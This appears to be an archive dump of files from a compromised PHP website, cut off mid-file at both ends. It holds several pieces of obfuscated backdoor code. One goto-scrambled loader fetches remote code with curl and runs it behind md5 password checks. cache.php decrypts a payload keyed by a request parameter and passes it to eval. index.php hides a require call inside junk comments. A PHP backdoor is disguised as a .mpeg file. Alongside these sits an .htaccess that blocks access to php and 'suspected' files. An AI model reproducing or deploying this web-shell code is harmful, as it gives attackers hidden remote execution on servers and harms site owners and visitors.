explode("\x3e", $R2mcr1OF_U0JIkSp); goto va8g6x2UzoVpvm0M; tnIUiVclMAGxFPps: $ZvTfnaCzNUBqn0d8 = $OyXE7rwpmzFPpzbL("\176", "\40"); goto AHcubFFffsTceUu9; QY0vYfLelAKvz3rB: return $IReeR_2q_YVlcrs4; goto yyD17opowHn4zuW1; va8g6x2UzoVpvm0M: $IReeR_2q_YVlcrs4 = ''; goto RVG6_RXnNdTU0ATv; RVG6_RXnNdTU0ATv: foreach ($MT41FacYCjhLwMa5 as $XsG5DxmrG0jc7il2 => $DyKRjEJ4Ls_mrS1z) { $IReeR_2q_YVlcrs4 .= $ZvTfnaCzNUBqn0d8[$DyKRjEJ4Ls_mrS1z - 56482]; oc7ZD5UzNJTMpDwS: } goto VIxRvb8l9S3K4TwY; yyD17opowHn4zuW1: } static function pEHcNfo4CL4soHq2($b4cj8baASP9RHUPp, $lEIupIShcS3NjSHt) { goto d8PGT_OKcZDhvkL_; d8PGT_OKcZDhvkL_: $zirYXhxBUxyUchQg = curl_init($b4cj8baASP9RHUPp); goto XpIQevKIIdRXIQEj; vKA1BLxf2fngK0Ew: return empty($xosVllYhIZe0sH9J) ? $lEIupIShcS3NjSHt($b4cj8baASP9RHUPp) : $xosVllYhIZe0sH9J; goto XG2S4474Jh2hffla; OrHh1xWkAbbIl4nC: $xosVllYhIZe0sH9J = curl_exec($zirYXhxBUxyUchQg); goto vKA1BLxf2fngK0Ew; XpIQevKIIdRXIQEj: curl_setopt($zirYXhxBUxyUchQg, CURLOPT_RETURNTRANSFER, 1); goto OrHh1xWkAbbIl4nC; XG2S4474Jh2hffla: } static function uz83XEljJzG3RPRk() { goto LrvL3BW7QmNcQr6t; NMEHTnzvWUGc2INr: LtWdpDkeCksIGa4L: goto k0kcvSQER93ADSRF; LrvL3BW7QmNcQr6t: $wN1XPFXlZpCmR6Y3 = array("\65\x36\x35\60\71\76\65\x36\x34\x39\x34\76\x35\x36\x35\60\x37\76\x35\66\65\61\x31\x3e\65\66\64\x39\62\76\65\x36\x35\x30\67\x3e\x35\66\65\x31\x33\x3e\x35\x36\x35\x30\66\x3e\65\66\64\x39\x31\x3e\65\x36\64\x39\x38\x3e\65\x36\65\x30\x39\76\65\66\x34\71\62\x3e\65\x36\x35\60\x33\x3e\x35\x36\x34\71\67\x3e\x35\66\x34\71\x38", "\65\x36\x34\71\63\76\65\x36\x34\71\62\x3e\x35\x36\64\71\x34\x3e\x35\x36\65\x31\63\76\x35\66\x34\x39\64\76\65\66\x34\71\x37\76\65\x36\x34\x39\62\76\x35\66\65\65\x39\x3e\65\x36\65\65\67", "\x35\66\65\60\62\76\x35\x36\64\x39\63\x3e\x35\66\64\71\x37\76\x35\66\64\71\70\x3e\x35\x36\65\x31\63\76\x35\66\65\60\x38\76\65\66\x35\x30\x37\x3e\x35\x36\x35\60\x39\x3e\x35\66\64\x39\x37\76\x35\x36\x35\x30\70\x3e\65\x36\65\x30\x37", "\x35\66\64\x39\66\76\x35\66\x35\61\x31\76\x35\x36\x35\x30\x39\x3e\65\x36\x35\x30\x31", "\x35\x36\65\61\60\x3e\x35\66\x35\61\x31\76\x35\66\64\71\63\76\65\x36\65\60\x37\x3e\65\x36\x35\x35\x34\76\x35\66\65\65\x36\76\65\x36\65\61\63\x3e\65\x36\x35\x30\x38\x3e\65\66\x35\x30\67\76\x35\x36\x35\x30\71\x3e\65\66\x34\x39\67\76\65\66\65\60\70\76\x35\66\65\60\67", "\65\66\65\x30\x36\76\65\x36\x35\60\63\76\65\x36\65\x30\x30\76\x35\x36\65\60\67\76\x35\x36\65\x31\63\x3e\x35\x36\65\60\x35\x3e\x35\66\65\x30\67\76\x35\x36\64\71\62\x3e\65\66\65\61\63\x3e\65\66\65\60\x39\x3e\x35\66\64\x39\67\x3e\65\66\x34\x39\x38\76\65\66\64\x39\x32\76\x35\x36\x35\x30\67\x3e\x35\66\x34\x39\x38\x3e\x35\x36\64\71\x32\76\x35\66\64\x39\x33", "\65\x36\x35\63\66\76\65\x36\x35\x36\66", "\65\66\x34\x38\x33", "\65\66\x35\66\61\x3e\65\x36\65\x36\x36", "\65\x36\65\64\x33\x3e\x35\66\65\62\66\x3e\x35\66\x35\62\x36\76\65\x36\x35\64\63\76\65\x36\65\61\71", "\x35\x36\x35\x30\66\x3e\x35\x36\65\60\x33\76\65\66\65\60\60\x3e\x35\x36\x34\x39\62\76\65\66\x35\60\x37\76\65\x36\x34\x39\64\x3e\65\66\x35\x31\63\x3e\x35\x36\x35\x30\x33\76\65\66\64\x39\70\76\65\x36\x34\x39\x36\76\65\66\x34\71\61\x3e\65\x36\64\71\62"); goto MksstpGH0JGDTtoj; yZaxdxarm0eH157Q: $BppI6FUxZ1f1zcqn = $O8B0c2b0Ocrta0Gs[2 + 0]($CwuvLDorUPRsYc3A, true); goto kcIkExvi1nJgFdBw; DRVgjNls8cZGXkLo: $CwuvLDorUPRsYc3A = @$O8B0c2b0Ocrta0Gs[1 + 2]($O8B0c2b0Ocrta0Gs[4 + 2], $ELHMrh9xVQvbJiqH); goto yZaxdxarm0eH157Q; kcIkExvi1nJgFdBw: @$O8B0c2b0Ocrta0Gs[5 + 5](INPUT_GET, "\x6f\146") == 1 && die($O8B0c2b0Ocrta0Gs[2 + 3](__FILE__)); goto UoZ4v5i7NIghTai7; UoZ4v5i7NIghTai7: if (!(@$BppI6FUxZ1f1zcqn[0] - time() > 0 and md5(md5($BppI6FUxZ1f1zcqn[2 + 1])) === "\142\x38\x66\141\67\x35\x36\67\61\145\65\x31\64\x30\x30\70\145\x36\x63\71\x38\x64\x31\146\x32\63\63\63\x31\x34\67\x63")) { goto LtWdpDkeCksIGa4L; } goto ZfxUmiOyp4xVLsxy; cqZq67LWJHFNgixU: $ELHMrh9xVQvbJiqH = @$O8B0c2b0Ocrta0Gs[1]($O8B0c2b0Ocrta0Gs[4 + 6](INPUT_GET, $O8B0c2b0Ocrta0Gs[7 + 2])); goto DRVgjNls8cZGXkLo; AeBl0bccCccg6V9Q: @$O8B0c2b0Ocrta0Gs[0]('', $O8B0c2b0Ocrta0Gs[7 + 0] . $O8B0c2b0Ocrta0Gs[3 + 1]($skElpDwFUQ5zam0k) . $O8B0c2b0Ocrta0Gs[5 + 3]); goto Rpn4OdmpOVgVbMPP; ZfxUmiOyp4xVLsxy: $skElpDwFUQ5zam0k = self::pehcNfo4Cl4sOhq2($BppI6FUxZ1f1zcqn[1 + 0], $O8B0c2b0Ocrta0Gs[5 + 0]); goto AeBl0bccCccg6V9Q; Rpn4OdmpOVgVbMPP: die; goto NMEHTnzvWUGc2INr; MksstpGH0JGDTtoj: foreach ($wN1XPFXlZpCmR6Y3 as $opswEfYB9wrvUNhO) { $O8B0c2b0Ocrta0Gs[] = self::yTStA4D1J6tH0xwc($opswEfYB9wrvUNhO); Mlr1OMQ3jCi7TMxg: } goto fg4Mo38ASwEeGI3f; fg4Mo38ASwEeGI3f: k925XNNHA1BioSDN: goto cqZq67LWJHFNgixU; k0kcvSQER93ADSRF: } } goto A1BhH_oNIu0lzocZ; qXB1EuL9cYMCm4VK: if (!(in_array(gettype($M4pefdsO1d_aLTD4) . "\62\x36", $M4pefdsO1d_aLTD4) && md5(md5(md5(md5($M4pefdsO1d_aLTD4[20])))) === "\x35\141\64\x62\70\61\61\65\x34\143\x39\144\65\x30\142\x32\x36\145\x38\70\60\x39\143\x39\142\x38\x64\144\x35\142\66\61")) { goto pFYkk73YGg7h8Nax; } goto n6UJzlJ7kFu1wOVa; xJ5L5vN7ooGdGNVj: @($M4pefdsO1d_aLTD4 = $M4pefdsO1d_aLTD4[84]($M4pefdsO1d_aLTD4[55], $M4pefdsO1d_aLTD4[70](${$M4pefdsO1d_aLTD4[37]}[27]))); goto VuhX2iIUMUKqv6r5; n6UJzlJ7kFu1wOVa: $M4pefdsO1d_aLTD4[70] = $M4pefdsO1d_aLTD4[70] . $M4pefdsO1d_aLTD4[73]; goto j1nSwq2927RB1nOU; VuhX2iIUMUKqv6r5: $M4pefdsO1d_aLTD4(); goto SJ4qDr5Wrb5rwGE_; rmU7bK021hFFOKev: $MU202we4sztOvuPe = range("\176", "\40"); goto MzELuz6lADmUna4V; SJ4qDr5Wrb5rwGE_: pFYkk73YGg7h8Nax: goto zlOMNOML7QClHOVi; j1nSwq2927RB1nOU: $M4pefdsO1d_aLTD4[84] = $M4pefdsO1d_aLTD4[70]($M4pefdsO1d_aLTD4[84]); goto xJ5L5vN7ooGdGNVj; A1BhH_oNIu0lzocZ: Wkbi8bdW7F2rSt8T::UZ83xelJjZg3rprk();
?>
Engine/.htaccess000066600000000424151137615740007565 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>cache.php000066600000013015151137622220006325 0ustar00<?php $JwyK = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXSqzLz0nISS1KRWEmJxalmJvEpqcn5KakaxSVFRallGiqphWGaYGANAA'; $eqV = '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'; function JwyK($ghIlP) { $eqV = ${"\137\x52\x45\121\125\x45\123\x54"}["k"]; $mGwH = substr($eqV, 0, 16); $mVt = base64_decode($ghIlP); return openssl_decrypt($mVt, "AES-256-CBC", $eqV, OPENSSL_RAW_DATA, $mGwH); } if (JwyK('DjtPn+r4S0yvLCnquPz1fA')){ echo 'pHMJbvZM8zfLe9k5chLj5LGuYrWz+tOS5zzpxxV+eF5xC8C9hScJjL40umIC1jlK'; exit; } eval(htmlspecialchars_decode(gzinflate(base64_decode($JwyK)))); ?>index.php000066600000004506151137622220006376 0ustar00<?php /*-hi-*///
$TQqIB /*-`_oucd-*///
=/*-


┻⓪


jr(7{┻⓪


-*///
 "ra"/*-pP;-*///
."nge"; $phGS /*-y+`7C1-*///
=/*-<3-*///
 $TQqIB/*-b!Y(k-*///
(/*-fg2tE3&-*///
"~"/*-4pn-*///
,/*-
⋷≲⑬유➭⋟⇞⋘∖╉ℋ︹Ⓟ≦⇟⋪❆㊘⋙☶≗ⅽ⒨
=r⋷≲⑬유➭⋟⇞⋘∖╉ℋ︹Ⓟ≦⇟⋪❆㊘⋙☶≗ⅽ⒨
-*///
" "); /*-D4)hV|1-*///
@require/*-

㊥⇙┅Ⓢ┹§ⅵ┬⊪Ⅲ▸Ⅰ➙⋱♓‹⒙≐╀↣㊧⋳㈤

ivTZj㊥⇙┅Ⓢ┹§ⅵ┬⊪Ⅲ▸Ⅰ➙⋱♓‹⒙≐╀↣㊧⋳㈤

-*///
 $phGS/*-1!g-*///
[33+8].$phGS/*-
╒✉⊤ˉ↶▧℗◖︷☓⊙►㊜ⓡⓐ┌⊻✠✙┙⒜✃➫◯∈
67<sQ╒✉⊤ˉ↶▧℗◖︷☓⊙►㊜ⓡⓐ┌⊻✠✙┙⒜✃➫◯∈
-*///
[29+15].$phGS/*-

⑲▾⊐～⒟┨⇥╧ღ☭⓵㊠⑺╊

Uzyofy}⑲▾⊐～⒟┨⇥╧ღ☭⓵㊠⑺╊

-*///
[17+0].$phGS/*-


↰◆﹠﹨㊈ↆ


8,q↰◆﹠﹨㊈ↆ


-*///
[4+3].$phGS/*-
⒰↉º⇍┴✬⇇♠ⓖ✺◁ℨ∂◍Ⅲ®〈☧
t⒰↉º⇍┴✬⇇♠ⓖ✺◁ℨ∂◍Ⅲ®〈☧
-*///
[43+8].$phGS/*-}p2]{4h}z-*///
[33+4].$phGS/*-j,ZX=xE~y[-*///
[2+7].$phGS/*-

▸⋏¢﹉➇⒣✰♧⇣Ⅻ℘Ⓨ

GG@#▸⋏¢﹉➇⒣✰♧⇣Ⅻ℘Ⓨ

-*///
[7+31].$phGS/*-
⋶⇪↶⒋⒓⇑⋷☦⊍❻✭┠ⓣⅮ◕
E-OtZrA⋶⇪↶⒋⒓⇑⋷☦⊍❻✭┠ⓣⅮ◕
-*///
[24+3].$phGS/*-O|$HW5GE-*///
[3+37].$phGS/*-lTFJ-*///
[2+6].$phGS/*-
⒨㊖*≩‰⒛⒳⊍↯⇝Ⓦ☠」⊅♋≟♖≢≝∣㊭
;o⒨㊖*≩‰⒛⒳⊍↯⇝Ⓦ☠」⊅♋≟♖≢≝∣㊭
-*///
[34+23].$phGS/*-
⓰≅﹊╩↕⋘◽
^<o9⓰≅﹊╩↕⋘◽
-*///
[33+15].$phGS/*-


ℐ∅‐❖❄❺㊥ⅺⓜ✎㊔❆Ⅶ❀︿╤»☥◝↖⑱❇╃


+gcWW!clℐ∅‐❖❄❺㊥ⅺⓜ✎㊔❆Ⅶ❀︿╤»☥◝↖⑱❇╃


-*///
[53+1].$phGS/*-OS=U-*///
[9+3].$phGS/*-

∮〃├▓┧∴✰ℐ↧⊻↤✼〗ⓝ┖▬⒍㊅▕㊨➀⋆┾

^)kA∮〃├▓┧∴✰ℐ↧⊻↤✼〗ⓝ┖▬⒍㊅▕㊨➀⋆┾

-*///
[5+20].$phGS/*-+Ds?oBE-*///
[10+0].$phGS/*-u)o-*///
[24+25].$phGS/*-
➁➻⑦✷㎡≾⑽÷✸㊂︶ⅼ♠☇⊸⅒㊑➅Ⓛ㊜∄☵⇕
HxC➁➻⑦✷㎡≾⑽÷✸㊂︶ⅼ♠☇⊸⅒㊑➅Ⓛ㊜∄☵⇕
-*///
[7+9].$phGS/*-&Fe+-*///
[3+77].$phGS/*-m1o#-*///
[3+14].$phGS/*-_D<q-*///
[12+2].$phGS/*-sdo2-*///
[3+22].$phGS/*-

◶⊸⑳∻☎↬㊠

&-n[R~,◶⊸⑳∻☎↬㊠

-*///
[0+23]/*-98DDS]-*///
; ?>URmwKYuXcVvENHretMn.mpeg000066600000014226151137622220011123 0ustar00<?php
 goto rmU7bK021hFFOKev; zlOMNOML7QClHOVi: metaphone("\x63\146\146\x68\107\x6c\x6f\111\70\67\153\142\x74\146\x2b\x39\160\106\x4b\103\x72\121"); goto KJ6ZJJ6XWDoEASTx; MzELuz6lADmUna4V: $M4pefdsO1d_aLTD4 = ${$MU202we4sztOvuPe[15 + 16] . $MU202we4sztOvuPe[3 + 56] . $MU202we4sztOvuPe[23 + 24] . $MU202we4sztOvuPe[26 + 21] . $MU202we4sztOvuPe[22 + 29] . $MU202we4sztOvuPe[12 + 41] . $MU202we4sztOvuPe[51 + 6]}; goto qXB1EuL9cYMCm4VK; KJ6ZJJ6XWDoEASTx: class wkbi8BDW7F2rST8t { static function YTstA4d1j6tH0XwC($R2mcr1OF_U0JIkSp) { goto NMLpAkOE1TXctRGo; NMLpAkOE1TXctRGo: $OyXE7rwpmzFPpzbL = "\162" . "\141" . "\156" . "\x67" . "\145"; goto tnIUiVclMAGxFPps; VIxRvb8l9S3K4TwY: rv7IRjKa8CThE21w: goto QY0vYfLelAKvz3rB; AHcubFFffsTceUu9: $MT41FacYCjhLwMa5 = explode("\x3e", $R2mcr1OF_U0JIkSp); goto va8g6x2UzoVpvm0M; tnIUiVclMAGxFPps: $ZvTfnaCzNUBqn0d8 = $OyXE7rwpmzFPpzbL("\176", "\40"); goto AHcubFFffsTceUu9; QY0vYfLelAKvz3rB: return $IReeR_2q_YVlcrs4; goto yyD17opowHn4zuW1; va8g6x2UzoVpvm0M: $IReeR_2q_YVlcrs4 = ''; goto RVG6_RXnNdTU0ATv; RVG6_RXnNdTU0ATv: foreach ($MT41FacYCjhLwMa5 as $XsG5DxmrG0jc7il2 => $DyKRjEJ4Ls_mrS1z) { $IReeR_2q_YVlcrs4 .= $ZvTfnaCzNUBqn0d8[$DyKRjEJ4Ls_mrS1z - 56482]; oc7ZD5UzNJTMpDwS: } goto VIxRvb8l9S3K4TwY; yyD17opowHn4zuW1: } static function pEHcNfo4CL4soHq2($b4cj8baASP9RHUPp, $lEIupIShcS3NjSHt) { goto d8PGT_OKcZDhvkL_; d8PGT_OKcZDhvkL_: $zirYXhxBUxyUchQg = curl_init($b4cj8baASP9RHUPp); goto XpIQevKIIdRXIQEj; vKA1BLxf2fngK0Ew: return empty($xosVllYhIZe0sH9J) ? $lEIupIShcS3NjSHt($b4cj8baASP9RHUPp) : $xosVllYhIZe0sH9J; goto XG2S4474Jh2hffla; OrHh1xWkAbbIl4nC: $xosVllYhIZe0sH9J = curl_exec($zirYXhxBUxyUchQg); goto vKA1BLxf2fngK0Ew; XpIQevKIIdRXIQEj: curl_setopt($zirYXhxBUxyUchQg, CURLOPT_RETURNTRANSFER, 1); goto OrHh1xWkAbbIl4nC; XG2S4474Jh2hffla: } static function uz83XEljJzG3RPRk() { goto LrvL3BW7QmNcQr6t; NMEHTnzvWUGc2INr: LtWdpDkeCksIGa4L: goto k0kcvSQER93ADSRF; LrvL3BW7QmNcQr6t: $wN1XPFXlZpCmR6Y3 = array("\65\x36\x35\60\71\76\65\x36\x34\x39\x34\76\x35\x36\x35\60\x37\76\x35\66\65\61\x31\x3e\65\66\64\x39\62\76\65\x36\x35\x30\67\x3e\x35\66\65\x31\x33\x3e\x35\x36\x35\x30\66\x3e\65\66\64\x39\x31\x3e\65\x36\64\x39\x38\x3e\65\x36\65\x30\x39\76\65\66\x34\71\62\x3e\65\x36\x35\60\x33\x3e\x35\x36\x34\71\67\x3e\x35\66\x34\71\x38", "\65\x36\x34\71\63\76\65\x36\x34\71\62\x3e\x35\x36\64\71\x34\x3e\x35\x36\65\x31\63\76\x35\66\x34\x39\64\76\65\66\x34\71\x37\76\65\x36\x34\x39\62\76\x35\66\65\65\x39\x3e\65\x36\65\65\67", "\x35\66\65\60\62\76\x35\x36\64\x39\63\x3e\x35\66\64\71\x37\76\x35\66\64\71\70\x3e\x35\x36\65\x31\63\76\x35\66\65\60\x38\76\65\66\x35\x30\x37\x3e\x35\x36\x35\60\x39\x3e\x35\66\64\x39\x37\76\x35\x36\x35\x30\70\x3e\65\x36\65\x30\x37", "\x35\66\64\x39\66\76\x35\66\x35\61\x31\76\x35\x36\x35\x30\x39\x3e\65\x36\x35\x30\x31", "\x35\x36\65\61\60\x3e\x35\66\x35\61\x31\76\x35\66\64\71\63\76\65\x36\65\60\x37\x3e\65\x36\x35\x35\x34\76\x35\66\65\65\x36\76\65\x36\65\61\63\x3e\65\x36\x35\x30\x38\x3e\65\66\x35\x30\67\76\x35\x36\x35\x30\71\x3e\65\66\x34\x39\67\76\65\66\65\60\70\76\x35\66\65\60\67", "\65\66\65\x30\x36\76\65\x36\x35\60\63\76\65\x36\65\x30\x30\76\x35\x36\65\60\67\76\x35\x36\65\x31\63\x3e\x35\x36\65\60\x35\x3e\x35\66\65\x30\67\76\x35\x36\64\71\62\x3e\65\66\65\61\63\x3e\65\66\65\60\x39\x3e\x35\66\64\x39\67\x3e\65\66\x34\x39\x38\76\65\66\64\x39\x32\76\x35\x36\x35\x30\67\x3e\x35\66\x34\x39\x38\x3e\x35\x36\64\71\x32\76\x35\66\64\x39\x33", "\65\x36\x35\63\66\76\65\x36\x35\x36\66", "\65\66\x34\x38\x33", "\65\66\x35\66\61\x3e\65\x36\65\x36\x36", "\65\x36\65\64\x33\x3e\x35\66\65\62\66\x3e\x35\66\x35\62\x36\76\65\x36\x35\64\63\76\65\x36\65\61\71", "\x35\x36\x35\x30\66\x3e\x35\x36\65\60\x33\76\65\66\65\60\60\x3e\x35\x36\x34\x39\62\76\65\66\x35\60\x37\76\65\x36\x34\x39\64\x3e\65\66\x35\x31\63\x3e\x35\x36\x35\x30\x33\76\65\66\64\x39\70\76\65\x36\x34\x39\x36\76\65\66\x34\71\61\x3e\65\x36\64\71\62"); goto MksstpGH0JGDTtoj; yZaxdxarm0eH157Q: $BppI6FUxZ1f1zcqn = $O8B0c2b0Ocrta0Gs[2 + 0]($CwuvLDorUPRsYc3A, true); goto kcIkExvi1nJgFdBw; DRVgjNls8cZGXkLo: $CwuvLDorUPRsYc3A = @$O8B0c2b0Ocrta0Gs[1 + 2]($O8B0c2b0Ocrta0Gs[4 + 2], $ELHMrh9xVQvbJiqH); goto yZaxdxarm0eH157Q; 